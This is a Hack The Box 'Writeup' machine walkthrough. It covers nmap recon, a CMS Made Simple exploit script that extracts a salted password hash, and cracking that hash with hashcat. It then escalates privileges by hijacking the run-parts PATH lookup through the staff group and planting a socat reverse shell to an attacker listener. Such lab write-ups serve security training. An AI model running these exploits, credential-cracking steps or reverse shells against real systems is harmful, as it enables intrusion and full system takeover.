HTB Writeup

$ nmap -A -T4 -p- -sV

Starting Nmap 7.91 ( ) at 2020-10-16 21:59 CEST
Nmap scan report for
Host is up (0.042s latency).
Not shown: 65533 filtered ports
22/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 122.74 seconds

Although nmap says port 80 is open, it also appears to be as tcpwrapped.
What does it mean?

Tcpwrapped refers to tcpwrapper, a host-based network access control program on Unix and Linux.

When Nmap labels something tcpwrapped, it means that the behavior of the port is consistent with one that is protected by tcpwrapper.

Specifically, it means that a full TCP handshake was completed, but the remote host closed the connection without receiving any data.
It is important to note that tcpwrapper protects programs, not ports.

This means that a valid (not false-positive) tcpwrapped response indicates a real network service is available, but you are not on the list of hosts allowed to talk with it.

When a very large number of ports are shown as tcpwrapped, it is unlikely that they represent real services, so the behaviour probably means something else like a load balancer or firewall is intercepting the connection requests.

Access to

Eeyore DoS protection script?

We’ve found this page.

According to this data,

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Cookie: CMSSESSID9d372ef93962=c5esgjkeaerfa215rs0119gat7

There is a Cookie called: CMSSESSID9d372ef93962

We could use wpscan to try to guess what cms are we targeting, but in this case, it is just as easy as check the source code of the web page.
CMS Made simple

<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />

On Google: CMS Made simple 2019

$ python3 --url --wordlist

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

According to the script code, the password found will be obtained as an MD5 Hash. Hashcat can be used to crack it.

To be able to do it we also need the salt for the password found.

$ echo "62def4866937f08cc13bab43bb14e6f7:5a599ef579066807" > hash
$ hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
* Device #1: pthread-Intel(R) Core(TM) i7-5557U CPU @ 3.10GHz, 4376/4440 MB (2048 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

Session..........: hashcat
Status...........: Cracked
Hash.Name........: md5($salt.$pass)
Hash.Target......: 62def4866937f08cc13bab43bb14e6f7:5a599ef579066807
Time.Started.....: Sat Oct 17 17:22:23 2020 (8 secs)
Time.Estimated...: Sat Oct 17 17:22:31 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   577.3 kH/s (1.29ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4360192/14344385 (30.40%)
Rejected.........: 0/4360192 (0.00%)
Restore.Point....: 4358144/14344385 (30.38%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: raynerleow -> raygan96

Started: Sat Oct 17 17:21:19 2020
Stopped: Sat Oct 17 17:22:32 2020

Password is : raykayjay9

So we have obtained user and password.

$ ssh jkr@

The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:TEw8ogmentaVUz08dLoHLKmD7USL1uIqidsdoX77oy0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
jkr@'s password: 
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

jkr@writeup:~$ ls


jkr@writeup:~$ cat user.txt


Run Linpeas:

jkr@writeup:~$ wget

--2020-10-17 15:56:38--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 293431 (287K) [text/x-sh]
Saving to: ‘’                            100%[=======================================================================>] 286.55K   579KB/s    in 0.5s    

2020-10-17 15:56:39 (579 KB/s) - ‘’ saved [293431/293431]

jkr@writeup:~$ chmod +x
jkr@writeup:~$ ./

Starting linpeas. Caching Writable Folders...

Analyzing the results we see that user jkr also belongs to group staff.

[+] All users & groups
uid=0(root) gid=0(root) groups=0(root)                                                                                                                
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)

It is not a default group.

staff: Allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may «override» the executables in /bin and /usr/bin with the same name). Compare with group «adm», which is more related to monitoring/security.

Group staff writable groups are:

[+] Interesting GROUP writable files (not in Home) (max 500)

Based on the PATH variable,


/usr/local/bin is before /bin

Now let’s run pspy:

jkr@writeup:~$ wget

--2020-10-17 16:51:47--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                                100%[=======================================================================>]   2.94M  6.53MB/s    in 0.4s    

2020-10-17 16:51:48 (6.53 MB/s) - ‘pspy64’ saved [3078592/3078592]

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.

2020/10/17 17:06:01 CMD: UID=0    PID=17592  | /bin/sh -c /root/bin/ >/dev/null 2>&1
2020/10/17 17:06:19 CMD: UID=0    PID=17593  | sshd: jkr [priv]  
2020/10/17 17:06:19 CMD: UID=0    PID=17594  | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/                                                    
2020/10/17 17:06:19 CMD: UID=0    PID=17595  | run-parts --lsbsysinit /etc/update-motd.d 
2020/10/17 17:06:19 CMD: UID=0    PID=17596  | /bin/sh /etc/update-motd.d/10-uname 
2020/10/17 17:06:19 CMD: UID=0    PID=17597  | sshd: jkr [priv]  
2020/10/17 17:06:19 CMD: UID=1000 PID=17598  | sshd: jkr@pts/1   
2020/10/17 17:06:19 CMD: UID=1000 PID=17600  | -bash

When we log in from another ssh connection with user jkr, command run-parts is executed from a relative path.

This is important because it is when the PATH variable takes action.
when an absolute path is used, there is no need to use the PATH variable. The system knows where to find the command.

However, if a relative path is used, the system needs to check the PATH variable to find the first path that contains the required command.

In this case, if we create a run-parts command, when a new ssh connection is performed, this command will be executed.

Let’s create a known and «nice» run-parts command:

jkr@writeup:/tmp$ nano run-parts

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:

jkr@writeup:/tmp$ chmod +x run-parts
jkr@writeup:/tmp$ cp run-parts /usr/local/bin/
ssh jkr@

jkr@'s password:

socat file:tty,raw,echo=0 TCP-L:4242


root@writeup:/# whoami


root@writeup:/# cat /root/root.txt


Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *